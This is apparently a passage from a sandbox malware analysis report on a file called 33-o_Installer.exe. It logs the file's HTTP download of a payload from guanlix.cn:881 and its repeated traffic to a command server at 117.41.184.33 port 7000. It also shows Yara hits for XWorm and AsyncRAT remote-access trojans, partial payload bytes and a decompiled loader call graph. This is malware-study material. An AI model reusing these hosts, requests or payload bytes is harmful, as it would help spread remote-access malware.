              Jul 2, 2024 19:23:18.668581009 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:18.673379898 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:18.987014055 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:18.994548082 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:18.999480009 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:20.411755085 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:20.458408117 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:23.833760977 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:23.838692904 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:23.849277973 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:23.854249954 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:24.162863016 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:24.165126085 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:24.169897079 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:24.395735979 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:24.397407055 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:24.410382986 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:27.990624905 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:27.995441914 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:28.319869995 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:28.321887016 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:28.330295086 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.130672932 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.135530949 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.161998034 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.166848898 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.271461010 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.276649952 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.318464041 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.323698997 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.349386930 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.354468107 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.459237099 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.461656094 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.466471910 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.690136909 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.691966057 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.697695017 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.921214104 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.930197954 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.935081959 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.936249971 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.941173077 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:34.945099115 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:34.949937105 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:47.787884951 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:47.792819023 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:48.116353035 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:48.118292093 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:48.124032021 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:48.302916050 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:48.308233976 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:48.734982967 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:48.738965034 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:48.744268894 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.193258047 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:50.198143005 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.224258900 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:50.229114056 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.413168907 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.458467960 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:50.643094063 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.645178080 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:50.649924040 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.919321060 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:23:50.928309917 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:23:50.933199883 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:01.706901073 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:01.711869001 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:02.032432079 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:02.034761906 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:02.039556026 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:04.930875063 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:04.935707092 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:05.256546021 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:05.262367010 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:05.267117977 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:06.005727053 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:06.011322021 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:06.337575912 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:06.341160059 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:06.346271992 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:11.959001064 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:11.963993073 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:12.285346031 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:12.287755966 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:12.292540073 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:16.208780050 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:16.214085102 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:16.538374901 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:16.540339947 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:16.545120955 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:20.193352938 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:20.198210955 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:20.417272091 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:20.458439112 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:20.701064110 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:20.703126907 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:20.707892895 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:26.568197012 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:26.572968960 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:26.896312952 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:26.899323940 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:26.904160976 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:36.943370104 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:36.948180914 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:36.958794117 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:36.963577032 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:37.274439096 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:37.282253981 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:37.287156105 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:37.515722036 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:37.528079987 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:37.532898903 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:39.333678007 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:39.339329004 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:39.666112900 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:39.668134928 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:39.673065901 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:42.255743027 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:42.260824919 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:42.584285021 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:42.586925030 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:42.591864109 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:48.349273920 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:48.354377031 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:48.674994946 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:48.677648067 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:24:48.682595015 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:50.403516054 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:24:50.458458900 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:25:00.630534887 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:25:00.635405064 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:25:00.956203938 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:25:00.960560083 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:25:00.965763092 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:25:03.177566051 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:25:03.183125019 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:25:03.515460014 CEST700049705117.41.184.33192.168.2.5
              Jul 2, 2024 19:25:03.516211987 CEST497057000192.168.2.5117.41.184.33
              Jul 2, 2024 19:25:03.521011114 CEST700049705117.41.184.33192.168.2.5
              TimestampSource PortDest PortSource IPDest IP
              Jul 2, 2024 19:20:57.044548988 CEST6264653192.168.2.51.1.1.1
              Jul 2, 2024 19:20:57.490317106 CEST53626461.1.1.1192.168.2.5
              Jul 2, 2024 19:21:17.157212973 CEST53519421.1.1.1192.168.2.5
              Jul 2, 2024 19:21:22.278636932 CEST53538541.1.1.1192.168.2.5
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 2, 2024 19:20:57.044548988 CEST192.168.2.51.1.1.10xf935Standard query (0)guanlix.cnA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 2, 2024 19:20:57.490317106 CEST1.1.1.1192.168.2.50xf935No error (0)guanlix.cn91.208.240.157A (IP address)IN (0x0001)false
              • guanlix.cn:881
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.54970491.208.240.1578814292C:\Users\user\Desktop\33-o_Installer.exe
              TimestampBytes transferredDirectionData
              Jul 2, 2024 19:20:57.503222942 CEST93OUTGET /33.ccp HTTP/1.1
              User-Agent: Download
              Host: guanlix.cn:881
              Cache-Control: no-cache
              Jul 2, 2024 19:20:58.440746069 CEST1236INHTTP/1.1 200 OK
              Server: nginx/1.26.1
              Date: Tue, 02 Jul 2024 17:20:41 GMT
              Content-Type: application/octet-stream
              Content-Length: 71938
              Last-Modified: Wed, 12 Jun 2024 10:07:44 GMT
              Connection: keep-alive
              ETag: "66697370-11902"
              Accept-Ranges: bytes
              Data Raw: e8 88 bb 00 00 88 bb 00 00 58 6d fb 30 4e 7e 88 32 a2 6f 69 d3 f9 fa 9a de 2f 3a c5 c9 ab 23 45 fc ba f0 f2 a1 14 af 35 d5 00 00 00 00 72 d9 9a f4 56 15 83 7f 51 7f 5a 06 d3 a2 08 d5 c4 78 e4 ff 0d 47 a9 16 dd 99 d1 0c f7 ed 32 fd 17 06 ba cc 7c 27 cd 13 e0 cc a7 f0 a1 1a 42 09 75 fb 8a fd 5c ed d7 8f f9 64 23 f4 82 cc 3e 98 03 b5 94 ca 48 e1 dd 6e 27 f7 a4 ef b9 48 34 6e c9 db fe 57 ed ca b3 14 ff c2 bf 03 a0 6b e0 ef 3e da d5 95 a1 57 34 c2 8a e0 91 b8 e0 1e 77 84 18 4a a1 1f ae 5a 97 f2 ac 24 40 05 a3 e4 8c 84 2f bd d8 fb 8e 4d 3f 13 a7 3d 6f a6 13 ac 27 e9 83 b0 7a 1b da ed fb b0 24 e3 2e a3 c2 25 00 a0 83 d3 b9 59 bc 2e 22 14 29 0a 7c 94 3f e1 51 f3 3a 75 a6 5d 6c c0 c7 8c c7 c5 4c e6 47 50 1a 66 d7 8e b6 bd 2f 4c 89 69 7a 56 cc cf 6e c4 48 76 85 0e d7 7b 0a 55 61 90 78 e7 7f 42 56 95 4f 53 d5 16 a6 f7 7c 99 24 3b 8c f0 40 61 60 d2 d7 5f 16 05 bf f1 ae 8e 0b a2 9f d5 7d d9 df a3 f5 c7 6b 08 8c f3 b2 e2 4d e8 ee 27 28 1c 81 1d d8 be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
              Data Ascii: Xm0N~2oi/:#E5rVQZxG2|'Bu\d#>Hn'H4nWk>W4wJZ$@/M?=o'z$.%Y.")|?Q:u]lLGPf/LizVnHv{UaxBVOS|$;@a`_}kM'((jYY2IPZPk<ATHYZIp37\<m`w(gw!)@{3h"l=jzZ^TVk^[WJ\s>WyNn"jXBdZLx {J1_\<p.NoND?=/Nr*X<8:PHMOt^|"XE?iI'g]Ek(E]F,A}?tQ }5l\TT$NfHP9#3qKox~.kkhN;<_rm{oRp?-E


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:13:20:55
              Start date:02/07/2024
              Path:C:\Users\user\Desktop\33-o_Installer.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\33-o_Installer.exe"
              Imagebase:0xdc0000
              File size:249'344 bytes
              MD5 hash:BAF30C254157B0F36A967CCFDB3850ED
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.4498830874.0000000005820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
              • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.4497904003.0000000003360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4498244402.0000000003631000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:11.2%
                Dynamic/Decrypted Code Coverage:11%
                Signature Coverage:2%
                Total number of Nodes:799
                Total number of Limit Nodes:79
                execution_graph 25965 dc2c4c 25966 dc2c5a 25965->25966 25969 dc2c6d Mailbox 25965->25969 25971 dc2875 25966->25971 25968 dc2c5f 25978 dc5902 25968->25978 25972 dc287f __EH_prolog 25971->25972 25974 dc28a6 Mailbox 25972->25974 25991 dc252d 77 API calls 2 library calls 25972->25991 25974->25968 25975 dc28c5 25975->25974 25992 dc566a 99 API calls 4 library calls 25975->25992 25993 dc2423 77 API calls 2 library calls 25975->25993 25979 dc590e __getstream 25978->25979 25980 dc5920 25979->25980 25982 dc5935 25979->25982 26010 dca95f 66 API calls __getptd_noexit 25980->26010 25983 dc50e4 __lock_file 67 API calls 25982->25983 25988 dc5930 __getstream 25982->25988 25985 dc594e 25983->25985 25984 dc5925 26011 dca90d 11 API calls _strcat_s 25984->26011 25994 dc5895 25985->25994 25988->25969 25991->25975 25992->25975 25993->25975 25995 dc58ba 25994->25995 25996 dc58a6 25994->25996 26002 dc58b6 25995->26002 26013 dc51c2 25995->26013 26019 dca95f 66 API calls __getptd_noexit 25996->26019 25998 dc58ab 26020 dca90d 11 API calls _strcat_s 25998->26020 26012 dc596e LeaveCriticalSection LeaveCriticalSection _fseek 26002->26012 26004 dc58ce 26005 dcb0e3 __fclose_nolock 66 API calls 26004->26005 26006 dc58d4 26005->26006 26022 dcc687 72 API calls 5 library calls 26006->26022 26008 dc58da 26008->26002 26023 dc4452 66 API calls 2 library calls 26008->26023 26010->25984 26011->25988 26012->25988 26014 dc51db 26013->26014 26018 dc51fd 26013->26018 26015 dcb0e3 __fclose_nolock 66 API calls 26014->26015 26014->26018 26016 dc51f6 26015->26016 26017 dcbee7 __write 97 API calls 26016->26017 26017->26018 26021 dcc094 66 API calls _free 26018->26021 26019->25998 26020->26002 26021->26004 26022->26008 26023->26002 25245 336fb37 25262 3371628 GetPEB 25245->25262 25247 336fb57 25248 3371628 GetPEB 25247->25248 25249 336fb6b 25248->25249 25250 336fb84 VirtualAlloc 25249->25250 25261 336fcc8 25249->25261 25251 336fb9b 25250->25251 25250->25261 25252 3371628 GetPEB 25251->25252 25251->25261 25253 336fc0d 25252->25253 25254 336fc2b LoadLibraryA 25253->25254 25257 336fc3b 25253->25257 25253->25261 25254->25254 25254->25257 25255 3371628 GetPEB 25255->25257 25256 336fc77 25256->25261 25264 336ffe7 LoadLibraryA 25256->25264 25257->25255 25257->25256 25257->25261 25263 337163c 25262->25263 25263->25247 25265 3370004 25264->25265 25266 336fcb5 25264->25266 25265->25266 25267 337002c VirtualProtect 25265->25267 25266->25261 25274 33700cd 25266->25274 25267->25266 25268 3370040 25267->25268 25269 337005a VirtualProtect 25268->25269 25270 3370076 25269->25270 25270->25266 25271 337008a VirtualProtect 25270->25271 25271->25266 25272 337009a 25271->25272 25273 33700af VirtualProtect 25272->25273 25273->25266 25276 33700de 25274->25276 25275 33700e4 25275->25261 25276->25275 25277 3370112 VirtualProtect 25276->25277 25277->25275 25278 3370126 25277->25278 25279 3370140 VirtualProtect 25278->25279 25280 337015c 25279->25280 25280->25275 25281 3370170 VirtualProtect 25280->25281 25281->25275 25282 3370180 25281->25282 25283 3370195 VirtualProtect 25282->25283 25283->25275 25284 58314e0 25285 58314e4 25284->25285 25289 58317e1 25285->25289 25295 583165f 25285->25295 25300 5831778 25285->25300 25290 58317ea 25289->25290 25291 583174f 25289->25291 25290->25285 25292 58317a1 25291->25292 25305 5831810 25291->25305 25309 58317ff 25291->25309 25292->25285 25297 583169c 25295->25297 25296 58317a1 25296->25285 25297->25296 25298 5831810 3 API calls 25297->25298 25299 58317ff 3 API calls 25297->25299 25298->25297 25299->25297 25301 583174f 25300->25301 25302 58317a1 25301->25302 25303 5831810 3 API calls 25301->25303 25304 58317ff 3 API calls 25301->25304 25302->25285 25303->25301 25304->25301 25306 5831835 25305->25306 25313 5832463 25306->25313 25307 5831916 25310 5831810 25309->25310 25312 5832463 3 API calls 25310->25312 25311 5831916 25311->25311 25312->25311 25315 583249d 25313->25315 25314 58326fa 25314->25307 25318 5837308 25315->25318 25322 58372f8 25315->25322 25319 583732d 25318->25319 25327 5837597 25319->25327 25320 583738f 25320->25314 25323 5837287 25322->25323 25324 5837306 25322->25324 25323->25314 25326 5837597 3 API calls 25324->25326 25325 583738f 25325->25314 25326->25325 25331 58375d0 25327->25331 25339 58375e0 25327->25339 25328 58375b6 25328->25320 25332 58375e0 25331->25332 25333 58375ed 25332->25333 25347 5836f64 25332->25347 25333->25328 25335 5837636 25335->25328 25337 58376fe GlobalMemoryStatusEx 25338 583772e 25337->25338 25338->25328 25340 5837615 25339->25340 25341 58375ed 25339->25341 25342 5836f64 GlobalMemoryStatusEx 25340->25342 25341->25328 25344 5837632 25342->25344 25343 5837636 25343->25328 25344->25343 25345 58376fe GlobalMemoryStatusEx 25344->25345 25346 583772e 25345->25346 25346->25328 25348 5836f6b GlobalMemoryStatusEx 25347->25348 25350 5837632 25348->25350 25350->25335 25350->25337 26024 dc3aa9 26025 dc3ac8 26024->26025 26027 dc3a8a std::_Xfsopen 143 API calls 26025->26027 26029 dc3b0e 26025->26029 26033 dc3af4 26025->26033 26027->26029 26032 dc3b15 26029->26032 26034 dc3a8a 26029->26034 26031 dc5902 __fcloseall 102 API calls 26031->26033 26032->26031 26032->26033 26038 dc747d 26034->26038 26036 dc3aa4 26036->26033 26037 dc75c3 101 API calls 5 library calls 26036->26037 26037->26032 26041 dc7489 __getstream 26038->26041 26039 dc749c 26096 dca95f 66 API calls __getptd_noexit 26039->26096 26041->26039 26043 dc74c9 26041->26043 26042 dc74a1 26097 dca90d 11 API calls _strcat_s 26042->26097 26057 dd14e3 26043->26057 26046 dc74ce 26047 dc74d5 26046->26047 26048 dc74e2 26046->26048 26098 dca95f 66 API calls __getptd_noexit 26047->26098 26050 dc7509 26048->26050 26051 dc74e9 26048->26051 26074 dd124c 26050->26074 26099 dca95f 66 API calls __getptd_noexit 26051->26099 26052 dc74ac @_EH4_CallFilterFunc@8 __getstream 26052->26036 26058 dd14ef __getstream 26057->26058 26059 dcb7b7 __lock 66 API calls 26058->26059 26060 dd14fd 26059->26060 26061 dd1579 26060->26061 26069 dcb6f5 __mtinitlocknum 66 API calls 26060->26069 26072 dd1572 26060->26072 26104 dc5125 67 API calls __lock 26060->26104 26105 dc5193 LeaveCriticalSection LeaveCriticalSection _doexit 26060->26105 26062 dc63b8 __malloc_crt 66 API calls 26061->26062 26064 dd1580 26062->26064 26066 dd158e InitializeCriticalSectionAndSpinCount 26064->26066 26064->26072 26065 dd1602 __getstream 26065->26046 26067 dd15ae 26066->26067 26068 dd15c1 EnterCriticalSection 26066->26068 26106 dc4452 66 API calls 2 library calls 26067->26106 26068->26072 26069->26060 26101 dd160d 26072->26101 26075 dd126e 26074->26075 26076 dd1282 26075->26076 26087 dd1299 26075->26087 26111 dca95f 66 API calls __getptd_noexit 26076->26111 26077 dd1436 26081 dd149c 26077->26081 26082 dd148a 26077->26082 26079 dd1287 26112 dca90d 11 API calls _strcat_s 26079->26112 26108 dd5135 26081->26108 26117 dca95f 66 API calls __getptd_noexit 26082->26117 26085 dd148f 26118 dca90d 11 API calls _strcat_s 26085->26118 26086 dc7514 26100 dc752f LeaveCriticalSection LeaveCriticalSection _fseek 26086->26100 26087->26077 26087->26082 26113 dd54bf 76 API calls __fassign 26087->26113 26090 dd1405 26090->26082 26114 dd5359 85 API calls __mbsnbicmp_l 26090->26114 26092 dd142f 26092->26077 26115 dd5359 85 API calls __mbsnbicmp_l 26092->26115 26094 dd144e 26094->26077 26116 dd5359 85 API calls __mbsnbicmp_l 26094->26116 26096->26042 26097->26052 26098->26052 26099->26052 26100->26052 26107 dcb6de LeaveCriticalSection 26101->26107 26103 dd1614 26103->26065 26104->26060 26105->26060 26106->26072 26107->26103 26119 dd5071 26108->26119 26110 dd5150 26110->26086 26111->26079 26112->26086 26113->26090 26114->26092 26115->26094 26116->26077 26117->26085 26118->26086 26121 dd507d __getstream 26119->26121 26120 dd5090 26238 dca95f 66 API calls __getptd_noexit 26120->26238 26121->26120 26123 dd50c6 26121->26123 26130 dd493d 26123->26130 26124 dd5095 26239 dca90d 11 API calls _strcat_s 26124->26239 26127 dd50e0 26240 dd5107 LeaveCriticalSection __unlock_fhandle 26127->26240 26129 dd509f __getstream 26129->26110 26131 dd4964 26130->26131 26241 dd7f22 26131->26241 26133 dd4bef 26267 dca8bb 26133->26267 26135 dd49bf 26270 dca972 66 API calls __getptd_noexit 26135->26270 26137 dd5070 __getstream 26140 dd5090 26137->26140 26144 dd50c6 26137->26144 26138 dd4980 26138->26133 26138->26135 26141 dd4a1a 26138->26141 26139 dd49c4 26271 dca95f 66 API calls __getptd_noexit 26139->26271 26301 dca95f 66 API calls __getptd_noexit 26140->26301 26149 dd4aa1 26141->26149 26154 dd4a74 26141->26154 26148 dd493d __tsopen_nolock 120 API calls 26144->26148 26145 dd49ce 26272 dca90d 11 API calls _strcat_s 26145->26272 26146 dd5095 26302 dca90d 11 API calls _strcat_s 26146->26302 26151 dd50e0 26148->26151 26273 dca972 66 API calls __getptd_noexit 26149->26273 26303 dd5107 LeaveCriticalSection __unlock_fhandle 26151->26303 26248 dd3f4b 26154->26248 26155 dd4aa6 26274 dca95f 66 API calls __getptd_noexit 26155->26274 26157 dd509f __getstream 26157->26127 26158 dd4ab0 26275 dca90d 11 API calls _strcat_s 26158->26275 26161 dd4b32 26163 dd4b5c CreateFileA 26161->26163 26164 dd4b3b 26161->26164 26162 dd49d8 26162->26127 26166 dd4bf9 GetFileType 26163->26166 26167 dd4b89 26163->26167 26276 dca972 66 API calls __getptd_noexit 26164->26276 26169 dd4c4a 26166->26169 26170 dd4c06 GetLastError 26166->26170 26171 dd4bc2 GetLastError 26167->26171 26174 dd4b9d CreateFileA 26167->26174 26168 dd4b40 26277 dca95f 66 API calls __getptd_noexit 26168->26277 26283 dd3d15 67 API calls 2 library calls 26169->26283 26281 dca985 66 API calls 3 library calls 26170->26281 26279 dca985 66 API calls 3 library calls 26171->26279 26174->26166 26174->26171 26176 dd4b4a 26278 dca95f 66 API calls __getptd_noexit 26176->26278 26177 dd4c2f CloseHandle 26178 dd4be9 26177->26178 26180 dd4c3d 26177->26180 26280 dca95f 66 API calls __getptd_noexit 26178->26280 26282 dca95f 66 API calls __getptd_noexit 26180->26282 26182 dd4c68 26186 dd4cbe 26182->26186 26187 dd4f5c 26182->26187 26191 dd4d2d 26182->26191 26185 dd4c42 26185->26178 26284 dd1772 68 API calls 3 library calls 26186->26284 26187->26133 26189 dd4fe6 CloseHandle CreateFileA 26187->26189 26192 dd4ef2 26189->26192 26193 dd5013 GetLastError 26189->26193 26190 dd4cc8 26194 dd4cea 26190->26194 26195 dd4cd1 26190->26195 26191->26187 26201 dd4e87 26191->26201 26212 dd4dd7 26191->26212 26192->26133 26299 dca985 66 API calls 3 library calls 26193->26299 26287 dd34e7 76 API calls 6 library calls 26194->26287 26285 dca972 66 API calls __getptd_noexit 26195->26285 26199 dd501f 26300 dd3d96 67 API calls 2 library calls 26199->26300 26200 dd4cd6 26200->26191 26204 dd4cde 26200->26204 26201->26187 26211 dd4ea4 26201->26211 26215 dd4dfb 26201->26215 26202 dd4cfb 26206 dd4d14 26202->26206 26288 dd7cb1 100 API calls 6 library calls 26202->26288 26286 dcc5eb 69 API calls 3 library calls 26204->26286 26205 dd4e42 26205->26204 26292 dd34e7 76 API calls 6 library calls 26205->26292 26206->26204 26289 dd1772 68 API calls 3 library calls 26206->26289 26293 dcc47c 68 API calls 3 library calls 26211->26293 26212->26187 26212->26205 26212->26215 26216 dd4e26 26212->26216 26214 dd4eaf 26214->26215 26218 dd4eba 26214->26218 26215->26187 26215->26204 26219 dcbee7 __write 97 API calls 26215->26219 26290 dcc47c 68 API calls 3 library calls 26216->26290 26294 dcc47c 68 API calls 3 library calls 26218->26294 26219->26215 26220 dd4eff 26223 dd4f21 26220->26223 26224 dd4f06 26220->26224 26221 dd4ee5 26295 dcc5eb 69 API calls 3 library calls 26221->26295 26222 dd4e5c 26222->26204 26222->26220 26222->26221 26222->26223 26229 dd4e7e 26222->26229 26298 dd1772 68 API calls 3 library calls 26223->26298 26297 dd1772 68 API calls 3 library calls 26224->26297 26225 dd4e31 26225->26215 26231 dd4e38 26225->26231 26229->26187 26291 dcc47c 68 API calls 3 library calls 26231->26291 26232 dd4ec4 26232->26187 26232->26204 26233 dd4eec 26296 dca95f 66 API calls __getptd_noexit 26233->26296 26234 dd4f10 26234->26204 26234->26229 26238->26124 26239->26129 26240->26129 26242 dd7f2e 26241->26242 26243 dd7f43 26241->26243 26304 dca95f 66 API calls __getptd_noexit 26242->26304 26243->26138 26245 dd7f33 26305 dca90d 11 API calls _strcat_s 26245->26305 26247 dd7f3e 26247->26138 26249 dd3f57 __getstream 26248->26249 26250 dcb6f5 __mtinitlocknum 66 API calls 26249->26250 26251 